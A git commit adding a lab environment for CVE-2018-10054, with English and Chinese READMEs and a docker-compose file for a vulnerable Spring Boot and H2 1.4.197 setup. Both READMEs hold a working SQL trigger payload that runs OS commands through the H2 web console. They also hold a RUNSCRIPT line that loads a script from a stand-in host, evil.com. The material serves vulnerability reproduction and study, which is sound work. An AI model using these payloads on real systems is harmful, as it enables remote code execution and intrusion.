first commit

h2database/CVE-2018-10054/README.md

@@ -0,0 +1,60 @@
+# H2 Database Web Console Authentication Remote Code Execution (CVE-2018-10054)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+H2 database is a fast, open-source Java-based relational database management system (RDBMS) that can be used in both embedded (within a Java application) and client-server modes.
+
+Springboot with h2 database comes with a web management page if you set the following options:
+
+```
+spring.h2.console.enabled=true
+spring.h2.console.settings.web-allow-others=true
+```
+
+H2 Database versions prior to 1.4.198 allow any user to access the web management page by creating a new database file or connecting to an in-memory database. After authentication, an arbitrary code can be executed by one of the following commands:
+
+- `RUNSCRIPT FROM 'http://evil.com/script.sql'`
+- `CREATE ALIAS func AS code...; CALL func ...`
+- `CREATE TRIGGER ... AS code...`
+
+References:
+
+- <https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html>
+- <https://www.exploit-db.com/exploits/45506>
+- <https://github.com/h2database/h2database/issues/1225>
+- <https://github.com/h2database/h2database/pull/1580>
+- <https://github.com/h2database/h2database/pull/1726>
+
+## Setup
+
+Start a spring-boot with h2 database 1.4.197:
+
+```
+docker compose up -d
+```
+
+After started the container, the spring-boot is listening on `http://your-ip:8080`, the management page is `http://your-ip:8080/h2-console/` by default.
+
+## Vulnerability Reproduce
+
+First, login the H2 web console by connecting to the in-memory database:
+
+```
+jdbc:h2:mem:test
+```
+
+![](1.png)
+
+Then, execute the following commands to execute the `id` command:
+
+```sql
+CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
+    var is = java.lang.Runtime.getRuntime().exec("id").getInputStream()
+    var scanner = new java.util.Scanner(is).useDelimiter("\\A")
+    throw new java.lang.Exception(scanner.next())
+$$;
+```
+
+As you can see, the `id` command is executed successfully and the result is raised as an exception.
+
+![](2.png)

h2database/CVE-2018-10054/README.zh-cn.md

@@ -0,0 +1,58 @@
+# H2 Database Web Console认证远程代码执行漏洞（CVE-2018-10054）
+
+H2 Database是一个快速、开源的基于Java的关系型数据库管理系统（RDBMS），可用于嵌入式（集成在Java应用中）或客户端-服务器模式中。
+
+当Spring Boot集成H2 Database时，如果设置如下选项，将会启用一个Web管理页面：
+
+```
+spring.h2.console.enabled=true
+spring.h2.console.settings.web-allow-others=true
+```
+
+在1.4.198之前的H2 Database版本中，任何用户都可以通过创建新的数据库文件或连接到内存数据库来访问Web管理页面。认证通过后，攻击者可以通过以下命令之一执行任意代码：
+
+- `RUNSCRIPT FROM 'http://evil.com/script.sql'`
+- `CREATE ALIAS func AS code...; CALL func ...`
+- `CREATE TRIGGER ... AS code...`
+
+参考链接：
+
+- <https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html>
+- <https://www.exploit-db.com/exploits/45506>
+- <https://github.com/h2database/h2database/issues/1225>
+- <https://github.com/h2database/h2database/pull/1580>
+- <https://github.com/h2database/h2database/pull/1726>
+
+## 环境搭建
+
+执行如下命令启动一个集成了H2 Database 1.4.197版本的Spring Boot：
+
+```
+docker compose up -d
+```
+
+容器启动后，Spring Boot服务监听在`http://your-ip:8080`，H2管理页面默认地址为`http://your-ip:8080/h2-console/`。
+
+## 漏洞复现
+
+首先，通过连接内存数据库登录H2 Web控制台：
+
+```
+jdbc:h2:mem:test
+```
+
+![](1.png)
+
+然后，执行如下命令以执行`id`命令：
+
+```sql
+CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
+    var is = java.lang.Runtime.getRuntime().exec("id").getInputStream()
+    var scanner = new java.util.Scanner(is).useDelimiter("\\A")
+    throw new java.lang.Exception(scanner.next())
+$$;
+```
+
+可见，`id`命令被成功执行，结果以异常的形式被抛出：
+
+![](2.png)

h2database/CVE-2018-10054/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+  web:
+    image: vulhub/spring-with-h2database:1.4.197
+    ports:
+      - "8080:8080"
+      - "5005:5005"